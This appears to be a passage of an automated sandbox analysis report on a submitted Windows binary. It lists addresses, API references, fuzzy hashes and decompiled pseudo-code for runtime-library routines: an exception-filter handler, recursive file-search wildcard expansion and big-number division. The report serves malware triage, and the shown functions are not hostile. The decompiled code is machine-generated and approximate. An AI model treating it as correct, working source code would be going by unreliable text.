                                                        0x00a02c56
                                                        0x00a02c10
                                                        0x00a02bc7
                                                        0x00a02bc9
                                                        0x00000000
                                                        0x00000000
                                                        0x00a02bcb
                                                        0x00a02bcd
                                                        0x00a02bcf
                                                        0x00a02bcf
                                                        0x00000000
                                                        0x00a02b73
                                                        0x00a02b73
                                                        0x00a02b73
                                                        0x00a02b76
                                                        0x00a02bac
                                                        0x00000000
                                                        0x00a02bac
                                                        0x00a02b79
                                                        0x00a02b79
                                                        0x00a02b7c
                                                        0x00a02ba0
                                                        0x00000000
                                                        0x00a02ba0
                                                        0x00a02b7e
                                                        0x00a02b7e
                                                        0x00a02b81
                                                        0x00a02b94
                                                        0x00a02b94
                                                        0x00000000
                                                        0x00a02b94
                                                        0x00a02b83
                                                        0x00a02b86
                                                        0x00000000
                                                        0x00000000
                                                        0x00a02b88
                                                        0x00000000
                                                        0x00a02b88
                                                        0x00a02b71
                                                        0x00a02a71
                                                        0x00a02a74
                                                        0x00000000
                                                        0x00000000
                                                        0x00a02a78
                                                        0x00000000
                                                        0x00a02a78
                                                        0x00a02a57
                                                        0x00a02a5a
                                                        0x00000000
                                                        0x00a02a5c
                                                        0x00a02a5c
                                                        0x00a02a5e
                                                        0x00000000
                                                        0x00a02a5e
                                                        0x00a02a5a
                                                        0x00a02959
                                                        0x00a0295c
                                                        0x00000000
                                                        0x00a02962
                                                        0x00a0296e
                                                        0x00a02976
                                                        0x00a0297e
                                                        0x00a0298d
                                                        0x00a02995
                                                        0x00a02998
                                                        0x00a0299e
                                                        0x00a029a4
                                                        0x00a029aa
                                                        0x00a029ac
                                                        0x00a029b6
                                                        0x00a029b6
                                                        0x00a029bc
                                                        0x00a029c3
                                                        0x00a029d1
                                                        0x00a029d4
                                                        0x00a029da
                                                        0x00a029da
                                                        0x00000000
                                                        0x00a029c3
                                                        0x00a0295c
                                                        0x00a028f9
                                                        0x00a02900
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a02900
                                                        0x00a028f0
                                                        0x00a028f0
                                                        0x00000000
                                                        0x00a02891
                                                        0x00a02893
                                                        0x00a031e9
                                                        0x00a031ec
                                                        0x00a031fa
                                                        0x00a03205
                                                        0x00a03205
                                                        0x00a0288f
                                                        0x00a0282b
                                                        0x00a0282d
                                                        0x00000000
                                                        0x00a0282d
                                                        0x00a027b1
                                                        0x00a027b3
                                                        0x00a027b5
                                                        0x00a027bb
                                                        0x00000000
                                                        0x00a027c7
                                                        0x00a027c9
                                                        0x00a027cd
                                                        0x00a027df
                                                        0x00a027ec
                                                        0x00000000
                                                        0x00a027ee
                                                        0x00a027fe
                                                        0x00a0280f
                                                        0x00a02814
                                                        0x00000000
                                                        0x00a02814
                                                        0x00a027ec

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A02776
                                                        • _strlen.LIBCMT ref: 00A02D04
                                                          • Part of subcall function 00A11692: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A0B842,00000000,?,?,?,0001039A), ref: 00A116AE
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A02E65
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                        • String ID: CMT
                                                        • API String ID: 1706572503-2756464174
                                                        • Opcode ID: 06393bf4e3f98353487d98db099d4bed3a88d9abdd5353122f8fa6f2e013d84b
                                                        • Instruction ID: c369432ae7ceab72fecf62a7359cd8513705e4f40bd51708d23e5a74cd677788
                                                        • Opcode Fuzzy Hash: 06393bf4e3f98353487d98db099d4bed3a88d9abdd5353122f8fa6f2e013d84b
                                                        • Instruction Fuzzy Hash: 6262F2729003488FDF18DF68D9997EA3BE5AF59304F04457EED9A8B2C2DB709948CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2898F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E00A2898F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0xa3e668; // 0xcba178b4
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00A1F351(_t41);
					_pop(_t62);
				}
				E00A1F5F0(_t67,  &_v804, 0, 0x50);
				E00A1F5F0(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x1b
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -785
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00A1F351(_t57);
				}
				return E00A1EEFA(_v8 ^ _t70);
			}





































                                                        0x00a2898f
                                                        0x00a2898f
                                                        0x00a2898f
                                                        0x00a2898f
                                                        0x00a2899a
                                                        0x00a2899f
                                                        0x00a289a1
                                                        0x00a289a9
                                                        0x00a289ab
                                                        0x00a289ae
                                                        0x00a289b3
                                                        0x00a289b3
                                                        0x00a289bf
                                                        0x00a289d2
                                                        0x00a289e0
                                                        0x00a289e6
                                                        0x00a289ec
                                                        0x00a289f2
                                                        0x00a289f8
                                                        0x00a289fe
                                                        0x00a28a04
                                                        0x00a28a0a
                                                        0x00a28a10
                                                        0x00a28a16
                                                        0x00a28a1d
                                                        0x00a28a24
                                                        0x00a28a2b
                                                        0x00a28a32
                                                        0x00a28a39
                                                        0x00a28a40
                                                        0x00a28a41
                                                        0x00a28a4a
                                                        0x00a28a50
                                                        0x00a28a50
                                                        0x00a28a53
                                                        0x00a28a59
                                                        0x00a28a66
                                                        0x00a28a6f
                                                        0x00a28a78
                                                        0x00a28a81
                                                        0x00a28a8f
                                                        0x00a28a91
                                                        0x00a28a97
                                                        0x00a28aa6
                                                        0x00a28ab2
                                                        0x00a28ab5
                                                        0x00a28aba
                                                        0x00a28ac9

                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A28A87
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A28A91
                                                        • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00A28A9E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: d3ab1c878c473b0d63d9ebfa590ed4d4ef6c4b3fb121a7391bbf59e650a41898
                                                        • Instruction ID: 6cf1562368f80baa1d8fcebe939ad4a6f76d6d0314ec20bb84a7a76856377420
                                                        • Opcode Fuzzy Hash: d3ab1c878c473b0d63d9ebfa590ed4d4ef6c4b3fb121a7391bbf59e650a41898
                                                        • Instruction Fuzzy Hash: E131957590122C9BCB21DF68DD897DDB7B4AF18310F5041EAF81CA7250EB749B858F45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2ADB8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E00A2ADB8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E00A288C9(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E00A2EB71(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E00A2AFF7(_a16, _t101, __eflags, _t111);
							E00A287FE(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E00A2EB71(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00A28B69();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0xa3e668; // 0xcba178b4
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E00A2EBC0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E00A1F5F0(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00A2ADB8(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E00A25D80(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00A2AC10);
									}
								} else {
									_push(_t55);
									_t57 = E00A2ADB8(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E00A2ADB8(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E00A1EEFA(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}















































                                                        0x00a2adbd
                                                        0x00a2adbe
                                                        0x00a2adc1
                                                        0x00a2adc1
                                                        0x00a2adc4
                                                        0x00a2adc4
                                                        0x00a2adc6
                                                        0x00a2adc7
                                                        0x00a2add0
                                                        0x00a2add1
                                                        0x00a2add4
                                                        0x00a2add7
                                                        0x00a2addc
                                                        0x00a2ade3
                                                        0x00a2ade4
                                                        0x00a2ade5
                                                        0x00a2ade8
                                                        0x00a2adf2
                                                        0x00a2adf5
                                                        0x00a2adf6
                                                        0x00a2adf8
                                                        0x00a2ae0c
                                                        0x00a2ae0c
                                                        0x00a2ae0f
                                                        0x00a2ae19
                                                        0x00a2ae1e
                                                        0x00a2ae21
                                                        0x00a2ae23
                                                        0x00000000
                                                        0x00a2ae25
                                                        0x00a2ae29
                                                        0x00a2ae32
                                                        0x00a2ae38
                                                        0x00000000
                                                        0x00a2ae3b
                                                        0x00a2adfa
                                                        0x00a2adfa
                                                        0x00a2ae00
                                                        0x00a2ae05
                                                        0x00a2ae08
                                                        0x00a2ae0a
                                                        0x00a2ae41
                                                        0x00a2ae43
                                                        0x00a2ae44
                                                        0x00a2ae45
                                                        0x00a2ae46
                                                        0x00a2ae47
                                                        0x00a2ae48
                                                        0x00a2ae4d
                                                        0x00a2ae51
                                                        0x00a2ae53
                                                        0x00a2ae59
                                                        0x00a2ae60
                                                        0x00a2ae63
                                                        0x00a2ae66
                                                        0x00a2ae67
                                                        0x00a2ae6a
                                                        0x00a2ae6b
                                                        0x00a2ae6e
                                                        0x00a2ae6f
                                                        0x00a2ae90
                                                        0x00a2ae90
                                                        0x00a2ae92
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2ae77
                                                        0x00a2ae79
                                                        0x00a2ae7b
                                                        0x00a2ae7d
                                                        0x00a2ae7f
                                                        0x00a2ae81
                                                        0x00a2ae83
                                                        0x00a2ae8e
                                                        0x00000000
                                                        0x00a2ae8e
                                                        0x00a2ae83
                                                        0x00a2ae7f
                                                        0x00000000
                                                        0x00a2ae7b
                                                        0x00a2ae94
                                                        0x00a2ae96
                                                        0x00a2ae99
                                                        0x00a2aeb2
                                                        0x00a2aeb2
                                                        0x00a2aeb4
                                                        0x00a2aeb7
                                                        0x00a2aec7
                                                        0x00a2aec9
                                                        0x00a2aec9
                                                        0x00a2aeb9
                                                        0x00a2aeb9
                                                        0x00a2aebc
                                                        0x00000000
                                                        0x00a2aebe
                                                        0x00a2aebe
                                                        0x00a2aec1
                                                        0x00000000
                                                        0x00a2aec3
                                                        0x00a2aec3
                                                        0x00a2aec3
                                                        0x00a2aec1
                                                        0x00a2aebc
                                                        0x00a2aecf
                                                        0x00a2aed7
                                                        0x00a2aedb
                                                        0x00a2aee9
                                                        0x00a2aeee
                                                        0x00a2af03
                                                        0x00a2af05
                                                        0x00a2af0b
                                                        0x00a2af0e
                                                        0x00a2af40
                                                        0x00a2af40
                                                        0x00a2af42
                                                        0x00a2af45
                                                        0x00a2af4b
                                                        0x00a2af4b
                                                        0x00a2af52
                                                        0x00a2af6c
                                                        0x00a2af6c
                                                        0x00a2af7b
                                                        0x00a2af80
                                                        0x00a2af83
                                                        0x00a2af85
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2af54
                                                        0x00a2af54
                                                        0x00a2af5a
                                                        0x00a2af5c
                                                        0x00000000
                                                        0x00a2af5e
                                                        0x00a2af5e
                                                        0x00a2af61
                                                        0x00000000
                                                        0x00a2af63
                                                        0x00a2af63
                                                        0x00a2af6a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2af6a
                                                        0x00a2af61
                                                        0x00a2af5c
                                                        0x00000000
                                                        0x00a2af87
                                                        0x00a2af8f
                                                        0x00a2af95
                                                        0x00a2af97
                                                        0x00a2af97
                                                        0x00a2af9f
                                                        0x00a2afa4
                                                        0x00a2afac
                                                        0x00a2afaf
                                                        0x00a2afb1
                                                        0x00a2afc5
                                                        0x00a2afca
                                                        0x00a2af10
                                                        0x00a2af10
                                                        0x00a2af14
                                                        0x00a2af1c
                                                        0x00a2af1c
                                                        0x00a2af1c
                                                        0x00a2af1e
                                                        0x00a2af21
                                                        0x00a2af24
                                                        0x00a2af24
                                                        0x00a2ae9b
                                                        0x00a2ae9e
                                                        0x00a2aea0
                                                        0x00000000
                                                        0x00a2aea2
                                                        0x00a2aea2
                                                        0x00a2aea8
                                                        0x00a2aead
                                                        0x00a2aea0
                                                        0x00a2af31
                                                        0x00a2af3c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2ae0a
                                                        0x00a2adde
                                                        0x00a2ade0
                                                        0x00a2ae3c
                                                        0x00a2ae40
                                                        0x00a2ae40
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .
                                                        • API String ID: 0-248832578
                                                        • Opcode ID: 6e3a2bea261c83c67f008166ab2bed91f3e07039bd99e8024fa00e304952c915
                                                        • Instruction ID: 8ff4b042c7ac10142cef9eda1f159402c7c2be969d77379762559f287c59b23d
                                                        • Opcode Fuzzy Hash: 6e3a2bea261c83c67f008166ab2bed91f3e07039bd99e8024fa00e304952c915
                                                        • Instruction Fuzzy Hash: AA3112B2900229AFCB249F7CDC85EFB7BBDDB95304F0001A8F41997251E6309E458B60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2CEB0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODECrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E00A2CEB0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00A1EA70(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00A31C00(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00A1EA90(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00A1EA90(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
